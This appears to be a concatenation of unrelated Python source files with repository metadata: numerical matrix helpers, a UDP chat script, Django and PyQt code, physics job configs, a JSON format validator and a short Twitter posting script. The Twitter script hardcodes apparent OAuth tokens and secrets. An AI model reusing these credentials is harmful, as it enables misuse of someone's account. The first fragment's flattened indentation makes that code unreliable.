return self.adjJacobi(T, S, 1 - t, X)
def log_mat(U):
"""Matrix logarithm, only use for normal matrices U, i.e., U * U^T = U^T * U"""
vals, vecs = la.eigh(U)
vals = np.log(np.where(vals > 1e-10, vals, 1))
return np.real(np.einsum('...ij,...j,...kj', vecs, vals, vecs))
def dexp(X, G):
"""Evaluate the derivative of the matrix exponential at
X in direction G.
"""
return np.array([expm_frechet(X[i],G[i])[1] for i in range(X.shape[0])])
def dlog(X, G):
"""Evaluate the derivative of the matrix logarithm at
X in direction G.
"""
n = X.shape[1]
# set up [[X, G], [0, X]]
W = np.hstack((np.dstack((X, G)), np.dstack((np.zeros_like(X), X))))
return np.array([logm(W[i])[:n, n:] for i in range(X.shape[0])])
def vectime3d(x, A):
"""
:param x: vector of length k
:param A: array of size k x n x m
:return: k x n x m array such that the j-th n x m slice of A is multiplied with the j-th element of x
"""
    assert np.size(x.shape) == 2 and np.size(A.shape) == 3
    assert x.shape[0] == 1 or x.shape[1] == 1
    assert x.shape[0] == A.shape[0] or x.shape[1] == A.shape[0]
    # transpose columns to rows (mirroring vectime3dB) so x broadcasts over A
    if x.shape[1] == 1:
        x = x.T
A = np.einsum('kij->ijk', A)
return np.einsum('ijk->kij', x * A)
def vectime3dB(x, A):
"""
:param x: vector of length k
:param A: array of size k x n x m
:return: k x n x m array such that the j-th n x m slice of A is multiplied with the j-th element of x
In case of k=1, x * A is returned.
"""
if np.isscalar(x) and A.ndim == 2:
return x * A
x = np.atleast_2d(x)
assert x.ndim <= 2 and np.size(A.shape) == 3
assert x.shape[0] == 1 or x.shape[1] == 1
assert x.shape[0] == A.shape[0] or x.shape[1] == A.shape[0]
if x.shape[1] == 1:
x = x.T
A = np.einsum('kij->ijk', A)
return np.einsum('ijk->kij', x * A)
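# Usage sketch (illustrative; uses only the methods defined above):
# manifold = SPD(k=2, d=3)
# S, T = manifold.rand(), manifold.rand()
# X = manifold.log(S, T)                      # tangent vector at S
# assert np.allclose(manifold.exp(S, X), T)   # exp/log round trip
# print(manifold.dist(S, T))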
|
[
"[email protected]"
] | |
4d4bf41cfc6668556e18405c2b1da9e6f85f8787
|
e0e96b8d26cd12c16a3e4a6265b6bceb11c4b1f0
|
/17day/updtest.py
|
2d6ca62c4a6dff1d92723fc2cea303250088b3cf
|
[] |
no_license
|
superwenqistyle/2-2018python
|
4419bc4ae4700e5b7839c4974106e03fc33e85f8
|
76e5ea72413abfa774ad61b3bdff76eba0c5e16c
|
refs/heads/master
| 2020-03-13T11:08:50.860361 | 2018-05-22T11:17:39 | 2018-05-22T11:17:39 | 131,096,306 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 713 |
py
|
from socket import *
from threading import Thread
from time import ctime
Id=""
port=0
updSocket=None
def send():
while True:
        message = input("Enter a message: ")
updSocket.sendto(message.encode("gb2312"),(Id,port))
def receive():
while True:
content=updSocket.recvfrom(1024)
print("%s-%s\n请输入内容:"%(content[0].decode("gb2312"),content[1][0]),end="")
def main():
global Id
global port
global updSocket
    Id = input("Enter the peer's IP address: ")
    port = int(input("Enter the peer's port number: "))
updSocket = socket(AF_INET,SOCK_DGRAM)
updSocket.bind(("",6666))
t = Thread(target=send)
t1 = Thread(target=receive)
t.start()
t1.start()
t.join()
t1.join()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
1626df6646682430eb9d47c57614e0fc6c70476f
|
194124b184101bbeb18c00482a1f60a6dd32eebf
|
/blog/migrations/0002_category.py
|
a811ab55f0b35be64c8208579dfff5eb7e36a19a
|
[] |
no_license
|
fc-wsd/s4-instablog
|
2fc758461f09fe124b28d86d29d4df429ef72040
|
8e38b07fe7dae0378fda228f2cfa7752f93254c9
|
refs/heads/master
| 2021-01-10T12:13:09.293036 | 2015-12-12T06:13:34 | 2015-12-12T06:13:34 | 45,733,935 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 660 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),
('name', models.CharField(max_length=200)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"[email protected]"
] | |
01b828d2865b4a3207556680e892c62aa6f28e15
|
2b468b1d22ecc5668529255676a1d43936829074
|
/codes/personal_backend/tuoen/abs/service/product/__init__.py
|
43853f724363e33396251d2f10c21af53b191a1a
|
[] |
no_license
|
MaseraTiGo/4U
|
5ac31b4cccc1093ab9a07d18218c3d8c0157dc9c
|
f572830aa996cfe619fc4dd8279972a2f567c94c
|
refs/heads/master
| 2023-07-26T09:44:21.014294 | 2023-07-13T03:43:34 | 2023-07-13T03:43:34 | 149,217,706 | 0 | 0 | null | 2020-06-05T20:38:16 | 2018-09-18T02:34:29 |
Python
|
UTF-8
|
Python
| false | false | 3,304 |
py
|
# coding=UTF-8
'''
Created on 2016-07-22
@author: Administrator
'''
import hashlib
import datetime
import json
import random
from django.db.models import Q
from tuoen.sys.core.exception.business_error import BusinessError
from tuoen.sys.utils.common.split_page import Splitor
from model.models import ProductModel
from model.models import Product
class ProductOperateServer(object):
@classmethod
def add(cls, **attrs):
"""add new product"""
        if Product.query(name=attrs['name']):
            raise BusinessError("product name already exists")
        product = Product.create(**attrs)
        if not product:
            raise BusinessError("failed to add product")
@classmethod
def update(cls, **attrs):
"""修改产品信息"""
if 'name' in attrs:
name = attrs['name']
id_qs = [p.id for p in Product.query(name=name)]
if id_qs and attrs['id'] not in id_qs:
raise BusinessError("产品名称已存在")
product = Product().update(**attrs)
return product
@classmethod
def search(cls, current_page, **search_info):
"""查询产品列表"""
if 'keyword' in search_info:
keyword = search_info.pop('keyword')
product_qs = Product.search(**search_info).filter(Q(name__contains = keyword) | \
Q(id__contains = keyword))
else:
product_qs = Product.search(**search_info)
product_qs = product_qs.order_by("-create_time")
return Splitor(current_page, product_qs)
@classmethod
def remove(cls, **attrs):
"""移除产品型号"""
id = attrs['id']
Product.query(id=id).delete()
return True
class ProductModelServer(object):
@classmethod
def add(cls, **attrs):
"""add new product model"""
        if ProductModel.query(name=attrs['name']):
            raise BusinessError("product model already exists")
product_id = attrs['product']
product = Product.get_byid(product_id)
attrs.update({"product": product})
product_model = ProductModel.create(**attrs)
if not product_model:
raise BusinessError("产品型号添加失败")
@classmethod
def update(cls, **attrs):
"""修改产品型号信息"""
product = ProductModel.query(id=attrs['id'])[0].product
attrs.update({'product': product})
if 'name' in attrs:
name = attrs['name']
product__model_ids = [pm.id for pm in ProductModel.query(name=name)]
if product__model_ids and attrs['id'] not in product__model_ids:
raise BusinessError("产品型号已存在")
product__model = ProductModel().update(**attrs)
return product__model
@classmethod
def search(cls, **search_info):
""""查询产品型号"""
product_id = search_info.pop('id')
product = Product.get_byid(product_id)
product_model_qs = ProductModel.search(product=product)
product_model_qs = product_model_qs.order_by("-create_time")
return product_model_qs
@classmethod
def remove(cls, **attrs):
"""移除产品型号"""
id = attrs['id']
ProductModel.query(id=id).delete()
return True
|
[
"[email protected]"
] | |
919890dfa27b2785488ab4ec815c2d7c9bf0faa7
|
9cac3bc1c61f4de32251072e49c50b0543450490
|
/examples/find_available_seattlegeni_vessels.py
|
412176990dffaec0800a9c6acb8ef925e3c14bd2
|
[
"MIT"
] |
permissive
|
SeattleTestbed/experimentmanager
|
40b036028809fa77dcdec804d58853f679e326de
|
31c52f35fba1e367b1177b3a95ae65b4dd0e1a1c
|
refs/heads/master
| 2020-12-25T17:34:49.713296 | 2017-05-15T11:37:36 | 2017-05-15T11:37:36 | 20,136,879 | 0 | 5 | null | 2016-08-29T09:00:07 | 2014-05-24T18:43:36 |
Python
|
UTF-8
|
Python
| false | false | 4,356 |
py
|
"""
This script will look up all active nodes that are part of a testbed managed
by SeattleGENI and determine which vessels on those nodes are available.
This information could be used in various ways, one of them being to gather
information about those node locations, such as latency from a certain
location, and decide which vessels to acquire based on that information.
Note: This script can result in a large amount of node communication.
Specifically, it will try to communicate with every node that is part of
the testbed.
Example output of this script:
Number of advertising nodes: 452
DEBUG: only looking at 5 nodes.
Failure on NAT$2dfeca92a68744eb493cf5ba5559cdcee03684c5v2:1224: Connection Refused! ['[Errno 111] Connection refused']
On 1.1.1.1:1224 found 6 available vessels
On 4.4.4.4:1224 found 6 available vessels
On 3.3.3.3:1224 found 5 available vessels
Failure on 2.2.2.2:1224: timed out
Number of nodes that SeattleGENI vessels are available on: 3
"""
import sys
import traceback
# If this script resides outside of the directory that contains the seattlelib
# files and experimentlib.py, then you'll need to set that path here.
EXPERIMENTLIB_DIRECTORY = "./experimentlibrary/"
sys.path.append(EXPERIMENTLIB_DIRECTORY)
import experimentlib
# This can be used to adjust how many threads are used for concurrently
# contacting nodes when experimentlib.run_parallelized() is called.
#experimentlib.num_worker_threads = 10
# The public key that all seattlegeni nodes advertise under.
SEATTLECLEARINGHOUSE_PUBLICKEY_FILENAME = "seattlegeni_advertisement.publickey"
# Useful for development. Only contact this many nodes.
MAX_NODES_TO_LOOK_AT = 5
def main():
identity = experimentlib.create_identity_from_key_files(SEATTLECLEARINGHOUSE_PUBLICKEY_FILENAME)
nodelocation_list = experimentlib.lookup_node_locations_by_identity(identity)
print("Number of advertising nodes: " + str(len(nodelocation_list)))
if MAX_NODES_TO_LOOK_AT is not None:
print("DEBUG: only looking at " + str(MAX_NODES_TO_LOOK_AT) + " nodes.")
nodelocation_list = nodelocation_list[:MAX_NODES_TO_LOOK_AT]
# Talk to each nodemanager to find out vessel information.
browse_successlist, failurelist = \
experimentlib.run_parallelized(nodelocation_list, browse_node_for_available_vessels)
# Create a dictionary whose keys are the nodeids and values are lists of
# vesseldicts of the available vessels on that node.
available_vesseldicts_by_node = {}
for (nodeid, available_vesseldicts) in browse_successlist:
if available_vesseldicts:
available_vesseldicts_by_node[nodeid] = available_vesseldicts
print("Number of nodes that SeattleGENI vessels are available on: " +
str(len(available_vesseldicts_by_node.keys())))
def browse_node_for_available_vessels(nodelocation):
"""
Contact the node at nodelocation and return a list of vesseldicts
for each vessel on the node.
"""
try:
# Ask the node for information about the vessels on it.
vesseldict_list = experimentlib.browse_node(nodelocation)
# Gather up a list of vesseldicts of the available vessels.
available_vesseldict_list = []
for vesseldict in vesseldict_list:
if is_vessel_available(vesseldict):
available_vesseldict_list.append(vesseldict)
# Just so we can watch the progress, print some output.
# We display the nodelocation rather than the nodeid because it's more
# interesting to look at, even though nodes can change location and this
# isn't a unique identifier of the node.
print("On " + nodelocation + " found " +
str(len(available_vesseldict_list)) + " available vessels")
return available_vesseldict_list
    except experimentlib.NodeCommunicationError as e:
print("Failure on " + nodelocation + ": " + str(e))
except:
traceback.print_exc()
def is_vessel_available(vesseldict):
"""
    This returns True or False depending on whether the vesseldict indicates
    an available vessel. That is, one that can be acquired through SeattleGENI.
"""
if vesseldict['vesselname'] == 'v2':
# v2 is a special vessel that will never be available from SeattleGENI.
return False
else:
# If there are no userkeys, the vessel is available.
return len(vesseldict['userkeys']) == 0
if __name__ == "__main__":
main()
|
[
"USER@DOMAIN"
] |
USER@DOMAIN
|
871588cf841884f7fc798cea219e466dad82e5ed
|
c123cb27fbb807acbc4a8bc6148e539dc8c3c3a3
|
/view/Ui_CadastrePageReportDialog.py
|
bf2daf3ef71c709552d9ebe8c80c5b11dea33fb7
|
[] |
no_license
|
ankhbold/lm3_mgis
|
0b1e5498adc3d556b7ea0656ae9fdc02c47fc0f7
|
a2b4fbdcf163662c179922698537ea9150ba16e5
|
refs/heads/master
| 2020-08-06T20:17:49.049160 | 2019-10-08T05:35:05 | 2019-10-08T05:35:05 | 213,139,587 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,886 |
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'D:\work\LAND_MANAGER\lm2\view\CadastrePageReportDialog.ui.'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
# The generated code uses the PyQt4 API (QtGui widgets, QString, UnicodeUTF8),
# so import from PyQt4 rather than PyQt5.
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_CadastrePageReportDialog(object):
def setupUi(self, CadastrePageReportDialog):
CadastrePageReportDialog.setObjectName(_fromUtf8("CadastrePageReportDialog"))
CadastrePageReportDialog.resize(732, 453)
self.close_button = QtGui.QPushButton(CadastrePageReportDialog)
self.close_button.setGeometry(QtCore.QRect(650, 410, 75, 23))
self.close_button.setObjectName(_fromUtf8("close_button"))
self.find_button = QtGui.QPushButton(CadastrePageReportDialog)
self.find_button.setGeometry(QtCore.QRect(450, 59, 75, 23))
self.find_button.setObjectName(_fromUtf8("find_button"))
self.cpage_twidget = QtGui.QTableWidget(CadastrePageReportDialog)
self.cpage_twidget.setGeometry(QtCore.QRect(10, 110, 718, 292))
self.cpage_twidget.setObjectName(_fromUtf8("cpage_twidget"))
self.cpage_twidget.setColumnCount(7)
self.cpage_twidget.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(3, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(4, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(5, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(6, item)
self.results_label = QtGui.QLabel(CadastrePageReportDialog)
self.results_label.setGeometry(QtCore.QRect(10, 90, 201, 16))
self.results_label.setText(_fromUtf8(""))
self.results_label.setObjectName(_fromUtf8("results_label"))
self.print_button = QtGui.QPushButton(CadastrePageReportDialog)
self.print_button.setGeometry(QtCore.QRect(550, 410, 75, 23))
self.print_button.setObjectName(_fromUtf8("print_button"))
self.line = QtGui.QFrame(CadastrePageReportDialog)
self.line.setGeometry(QtCore.QRect(0, 20, 731, 16))
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.line_2 = QtGui.QFrame(CadastrePageReportDialog)
self.line_2.setGeometry(QtCore.QRect(0, 430, 731, 16))
self.line_2.setFrameShape(QtGui.QFrame.HLine)
self.line_2.setFrameShadow(QtGui.QFrame.Sunken)
self.line_2.setObjectName(_fromUtf8("line_2"))
self.label_2 = QtGui.QLabel(CadastrePageReportDialog)
self.label_2.setGeometry(QtCore.QRect(10, 10, 281, 16))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.print_year_chbox = QtGui.QCheckBox(CadastrePageReportDialog)
self.print_year_chbox.setGeometry(QtCore.QRect(330, 40, 101, 17))
self.print_year_chbox.setObjectName(_fromUtf8("print_year_chbox"))
self.print_year_sbox = QtGui.QSpinBox(CadastrePageReportDialog)
self.print_year_sbox.setEnabled(False)
self.print_year_sbox.setGeometry(QtCore.QRect(330, 59, 91, 22))
self.print_year_sbox.setMinimum(2000)
self.print_year_sbox.setMaximum(2100)
self.print_year_sbox.setProperty("value", 2017)
self.print_year_sbox.setObjectName(_fromUtf8("print_year_sbox"))
self.label_3 = QtGui.QLabel(CadastrePageReportDialog)
self.label_3.setGeometry(QtCore.QRect(10, 40, 171, 16))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.person_id_edit = QtGui.QLineEdit(CadastrePageReportDialog)
self.person_id_edit.setGeometry(QtCore.QRect(10, 60, 150, 20))
self.person_id_edit.setObjectName(_fromUtf8("person_id_edit"))
self.parcel_id_edit = QtGui.QLineEdit(CadastrePageReportDialog)
self.parcel_id_edit.setGeometry(QtCore.QRect(170, 60, 150, 20))
self.parcel_id_edit.setObjectName(_fromUtf8("parcel_id_edit"))
self.label_4 = QtGui.QLabel(CadastrePageReportDialog)
self.label_4.setGeometry(QtCore.QRect(170, 40, 151, 16))
self.label_4.setObjectName(_fromUtf8("label_4"))
self.retranslateUi(CadastrePageReportDialog)
QtCore.QMetaObject.connectSlotsByName(CadastrePageReportDialog)
def retranslateUi(self, CadastrePageReportDialog):
CadastrePageReportDialog.setWindowTitle(_translate("CadastrePageReportDialog", "Dialog", None))
self.close_button.setText(_translate("CadastrePageReportDialog", "close", None))
self.find_button.setText(_translate("CadastrePageReportDialog", "Find", None))
item = self.cpage_twidget.horizontalHeaderItem(0)
item.setText(_translate("CadastrePageReportDialog", "ID", None))
item = self.cpage_twidget.horizontalHeaderItem(1)
item.setText(_translate("CadastrePageReportDialog", "PrintDate", None))
item = self.cpage_twidget.horizontalHeaderItem(2)
item.setText(_translate("CadastrePageReportDialog", "Page Number", None))
item = self.cpage_twidget.horizontalHeaderItem(3)
item.setText(_translate("CadastrePageReportDialog", "Person ID", None))
item = self.cpage_twidget.horizontalHeaderItem(4)
item.setText(_translate("CadastrePageReportDialog", "Right Holder", None))
item = self.cpage_twidget.horizontalHeaderItem(5)
item.setText(_translate("CadastrePageReportDialog", "Parcel ID", None))
item = self.cpage_twidget.horizontalHeaderItem(6)
item.setText(_translate("CadastrePageReportDialog", "Streetname-Khashaa", None))
self.print_button.setText(_translate("CadastrePageReportDialog", "Print", None))
self.label_2.setText(_translate("CadastrePageReportDialog", "Cadastre page report", None))
self.print_year_chbox.setText(_translate("CadastrePageReportDialog", "Year Print", None))
self.label_3.setText(_translate("CadastrePageReportDialog", "Person ID", None))
self.label_4.setText(_translate("CadastrePageReportDialog", "Parcel ID", None))
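# Usage sketch (standard pyuic pattern, not part of the generated file):
# import sys
# app = QtGui.QApplication(sys.argv)
# dialog = QtGui.QDialog()
# ui = Ui_CadastrePageReportDialog()
# ui.setupUi(dialog)
# dialog.show()
# sys.exit(app.exec_())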
|
[
"[email protected]"
] | |
25622946d4cc694e63901dc2980ec2fa9f1ae137
|
57c62abd33f8b508e357ca8631a160ce85a7f340
|
/ggNtuplizer/test/crab_submit/jobs/FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/crab_FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8.py
|
4470aec7aea4019d8df76db06409c83c17dfeaf4
|
[] |
no_license
|
jainshilpi/aNTGC_ggNtuplizer
|
8973ce3cdab293317fd928679b14038f03c10976
|
7153d73fbee35969dad0d85c6517e577a0546566
|
refs/heads/master
| 2022-09-18T07:39:40.246699 | 2020-04-20T13:03:20 | 2020-04-20T13:03:20 | 267,979,045 | 1 | 1 | null | 2020-05-30T00:09:36 | 2020-05-30T00:09:36 | null |
UTF-8
|
Python
| false | false | 2,178 |
py
|
from CRABClient.UserUtilities import config, getUsernameFromSiteDB
import sys
config = config()
#**************************submit function***********************
from CRABAPI.RawCommand import crabCommand
from CRABClient.ClientExceptions import ClientException
from httplib import HTTPException
def submit(config):
try:
crabCommand('submit', config = config)
except HTTPException as hte:
print "Failed submitting task: %s" % (hte.headers)
except ClientException as cle:
print "Failed submitting task: %s" % (cle)
#****************************************************************
workarea='/afs/cern.ch/work/m/mwadud/private/naTGC/CMSSW_9_4_13/src/ggAnalysis/ggNtuplizer/test/crab_submit/jobs/FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/'
mainOutputDir = '/store/user/mwadud/aNTGC/ggNtuplizerSkim/xSecs/'
config.General.requestName = 'FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8'
config.General.transferLogs = True
config.General.workArea = '%s' % workarea
config.Site.storageSite = 'T2_US_Wisconsin'
config.Site.whitelist = ['T3_US_UCR','T3_US_FNALLPC','T2_US_Purdue','T3_US_Rice','T3_US_Cornell','T3_US_Rutgers','T3_US_FIU','T3_US_FIT','T3_US_PSC','T3_US_OSU','T3_US_TAMU','T3_US_UMD','T3_US_VC3_NotreDame','T3_US_SDSC','T3_US_Colorado','T3_US_OSG','T3_US_Princeton_ICSE','T3_US_NERSC','T3_US_Baylor','T2_US_Nebraska','T2_US_UCSD','T2_US_Wisconsin','T2_US_MIT','T3_US_TACC','T3_US_TTU','T3_US_UMiss']
config.Site.blacklist = ['T2_US_Florida','T2_US_Vanderbilt','T3_US_PuertoRico','T2_US_Caltech']
config.JobType.psetName = '/afs/cern.ch/work/m/mwadud/private/naTGC/CMSSW_9_4_13/src/ggAnalysis/ggNtuplizer/test/crab_submit/XsecAna.py'
config.JobType.pluginName = 'Analysis'
config.Data.inputDataset = '/GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/RunIIFall17MiniAODv2-PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/MINIAODSIM'
config.Data.publication = False
config.Data.allowNonValidInputDataset = True
config.Data.outLFNDirBase = '%s' % mainOutputDir
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob = 5000
config.Data.ignoreLocality = True
config.Data.totalUnits = 5000
submit(config)
|
[
"[email protected]"
] | |
f806b32b55a9145c4c04c121ccedc5edfff7e060
|
632d7759536ed0726499c2d52c8eb13b5ab213ab
|
/Data/Packages/mdpopups/tests/validate_json_format.py
|
0afbb2d170664281507ba611c0927e38799d1ae9
|
[
"MIT"
] |
permissive
|
Void2403/sublime_text_3_costomize
|
e660ad803eb12b20e9fa7f8eb7c6aad0f2b4d9bc
|
c19977e498bd948fd6d8f55bd48c8d82cbc317c3
|
refs/heads/master
| 2023-08-31T21:32:32.791574 | 2019-05-31T11:46:19 | 2019-05-31T11:46:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,661 |
py
|
"""
Validate JSON format.
Licensed under MIT
Copyright (c) 2012-2015 Isaac Muse <[email protected]>
"""
import re
import codecs
import json
RE_LINE_PRESERVE = re.compile(r"\r?\n", re.MULTILINE)
RE_COMMENT = re.compile(
r'''(?x)
(?P<comments>
/\*[^*]*\*+(?:[^/*][^*]*\*+)*/ # multi-line comments
| [ \t]*//(?:[^\r\n])* # single line comments
)
| (?P<code>
"(?:\\.|[^"\\])*" # double quotes
| .[^/"']* # everything else
)
''',
re.DOTALL
)
RE_TRAILING_COMMA = re.compile(
r'''(?x)
(
(?P<square_comma>
, # trailing comma
(?P<square_ws>[\s\r\n]*) # white space
(?P<square_bracket>\]) # bracket
)
| (?P<curly_comma>
, # trailing comma
(?P<curly_ws>[\s\r\n]*) # white space
(?P<curly_bracket>\}) # bracket
)
)
| (?P<code>
"(?:\\.|[^"\\])*" # double quoted string
| .[^,"']* # everything else
)
''',
re.DOTALL
)
RE_LINE_INDENT_TAB = re.compile(r'^(?:(\t+)?(?:(/\*)|[^ \t\r\n])[^\r\n]*)?\r?\n$')
RE_LINE_INDENT_SPACE = re.compile(r'^(?:((?: {4})+)?(?:(/\*)|[^ \t\r\n])[^\r\n]*)?\r?\n$')
RE_TRAILING_SPACES = re.compile(r'^.*?[ \t]+\r?\n?$')
RE_COMMENT_END = re.compile(r'\*/')
PATTERN_COMMENT_INDENT_SPACE = r'^(%s *?[^\t\r\n][^\r\n]*)?\r?\n$'
PATTERN_COMMENT_INDENT_TAB = r'^(%s[ \t]*[^ \t\r\n][^\r\n]*)?\r?\n$'
E_MALFORMED = "E0"
E_COMMENTS = "E1"
E_COMMA = "E2"
W_NL_START = "W1"
W_NL_END = "W2"
W_INDENT = "W3"
W_TRAILING_SPACE = "W4"
W_COMMENT_INDENT = "W5"
VIOLATION_MSG = {
E_MALFORMED: 'JSON content is malformed.',
E_COMMENTS: 'Comments are not part of the JSON spec.',
E_COMMA: 'Dangling comma found.',
W_NL_START: 'Unnecessary newlines at the start of file.',
W_NL_END: 'Missing a new line at the end of the file.',
W_INDENT: 'Indentation Error.',
W_TRAILING_SPACE: 'Trailing whitespace.',
W_COMMENT_INDENT: 'Comment Indentation Error.'
}
class CheckJsonFormat(object):
"""
Test JSON for format irregularities.
- Trailing spaces.
- Inconsistent indentation.
- New lines at end of file.
- Unnecessary newlines at start of file.
- Trailing commas.
- Malformed JSON.
"""
def __init__(self, use_tabs=False, allow_comments=False):
"""Setup the settings."""
self.use_tabs = use_tabs
self.allow_comments = allow_comments
self.fail = False
def index_lines(self, text):
"""Index the char range of each line."""
self.line_range = []
count = 1
last = 0
for m in re.finditer('\n', text):
self.line_range.append((last, m.end(0) - 1, count))
last = m.end(0)
count += 1
def get_line(self, pt):
"""Get the line from char index."""
line = None
for r in self.line_range:
if pt >= r[0] and pt <= r[1]:
line = r[2]
break
return line
def check_comments(self, text):
"""
Check for JavaScript comments.
Log them and strip them out so we can continue.
"""
def remove_comments(group):
return ''.join([x[0] for x in RE_LINE_PRESERVE.findall(group)])
def evaluate(m):
text = ''
g = m.groupdict()
if g["code"] is None:
if not self.allow_comments:
self.log_failure(E_COMMENTS, self.get_line(m.start(0)))
text = remove_comments(g["comments"])
else:
text = g["code"]
return text
content = ''.join(map(lambda m: evaluate(m), RE_COMMENT.finditer(text)))
return content
def check_dangling_commas(self, text):
"""
Check for dangling commas.
Log them and strip them out so we can continue.
"""
def check_comma(g, m, line):
# ,] -> ] or ,} -> }
self.log_failure(E_COMMA, line)
if g["square_comma"] is not None:
return g["square_ws"] + g["square_bracket"]
else:
return g["curly_ws"] + g["curly_bracket"]
def evaluate(m):
g = m.groupdict()
return check_comma(g, m, self.get_line(m.start(0))) if g["code"] is None else g["code"]
return ''.join(map(lambda m: evaluate(m), RE_TRAILING_COMMA.finditer(text)))
def log_failure(self, code, line=None):
"""
Log failure.
Log failure code, line number (if available) and message.
"""
if line:
print("%s: Line %d - %s" % (code, line, VIOLATION_MSG[code]))
else:
print("%s: %s" % (code, VIOLATION_MSG[code]))
self.fail = True
def check_format(self, file_name):
"""Initiate the check."""
self.fail = False
comment_align = None
with codecs.open(file_name, encoding='utf-8') as f:
count = 1
for line in f:
indent_match = (RE_LINE_INDENT_TAB if self.use_tabs else RE_LINE_INDENT_SPACE).match(line)
end_comment = (
(comment_align is not None or (indent_match and indent_match.group(2))) and
RE_COMMENT_END.search(line)
)
# Don't allow empty lines at file start.
if count == 1 and line.strip() == '':
self.log_failure(W_NL_START, count)
# Line must end in new line
if not line.endswith('\n'):
self.log_failure(W_NL_END, count)
# Trailing spaces
if RE_TRAILING_SPACES.match(line):
self.log_failure(W_TRAILING_SPACE, count)
# Handle block comment content indentation
if comment_align is not None:
if comment_align.match(line) is None:
self.log_failure(W_COMMENT_INDENT, count)
if end_comment:
comment_align = None
# Handle general indentation
elif indent_match is None:
self.log_failure(W_INDENT, count)
# Enter into block comment
elif comment_align is None and indent_match.group(2):
alignment = indent_match.group(1) if indent_match.group(1) is not None else ""
if not end_comment:
comment_align = re.compile(
(PATTERN_COMMENT_INDENT_TAB if self.use_tabs else PATTERN_COMMENT_INDENT_SPACE) % alignment
)
count += 1
f.seek(0)
text = f.read()
self.index_lines(text)
text = self.check_comments(text)
self.index_lines(text)
text = self.check_dangling_commas(text)
try:
json.loads(text)
except Exception as e:
self.log_failure(E_MALFORMED)
print(e)
return self.fail
if __name__ == "__main__":
import sys
cjf = CheckJsonFormat(False, True)
cjf.check_format(sys.argv[1])
|
[
"[email protected]"
] | |
e191dcd55943188856e0aa6d20abcb3ae22cd4d2
|
c5698844e4c5cd6428d25f5a97a2f4ad069df251
|
/twitter/publicar desde python/read.py
|
a394d4c896e493b5d9f689dc1751a7b77d468356
|
[] |
no_license
|
jrartd/Python-tools
|
1ade026dcc9b3987bb7a6af130403895a8456d3c
|
361031a2d108e048d267bf386a8a703359a81321
|
refs/heads/master
| 2022-12-21T23:38:53.038535 | 2018-02-09T18:18:10 | 2018-02-09T18:18:10 | 114,409,529 | 0 | 1 | null | 2022-12-12T09:18:07 | 2017-12-15T20:41:15 |
HTML
|
UTF-8
|
Python
| false | false | 458 |
py
|
from twitter import *
access_token = "712533602102284288-QGxqYcFiQlGZGTaoNIgHgq2KZxqZeeH"
access_token_secret = "rlH5ItRHtlguzChQbIvLDo1yYCu47liEtq8fdVgeOZpb9"
consumer_key = "VWe4b0p7vRcVS06gbJyS83dIS"
consumer_secret = "PjkoSJ4YxPXo4V9Uk7bazq4y507e6zBr96q7u2OlJeP1aVZd7w"
texto_tweet = input("Enter the text to tweet: ")
t = Twitter(auth=OAuth(access_token, access_token_secret, consumer_key, consumer_secret))
t.statuses.update(status= texto_tweet)
|
[
"[email protected]"
] | |
a1590dd5a7d854d633c6cc4a59cd757b06b26e95
|
84c4474a88a59da1e72d86b33b5326003f578271
|
/saleor/graphql/app/mutations/app_retry_install.py
|
64faee9ee45caa39c2e77961854e66c1815f20c1
|
[
"BSD-3-Clause"
] |
permissive
|
vineetb/saleor
|
052bd416d067699db774f06453d942cb36c5a4b7
|
b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9
|
refs/heads/main
| 2023-07-20T02:01:28.338748 | 2023-07-17T06:05:36 | 2023-07-17T06:05:36 | 309,911,573 | 0 | 0 |
NOASSERTION
| 2020-11-04T06:32:55 | 2020-11-04T06:32:55 | null |
UTF-8
|
Python
| false | false | 2,274 |
py
|
import graphene
from django.core.exceptions import ValidationError
from ....app import models
from ....app.error_codes import AppErrorCode
from ....app.tasks import install_app_task
from ....core import JobStatus
from ....permission.enums import AppPermission
from ....webhook.event_types import WebhookEventAsyncType
from ...core import ResolveInfo
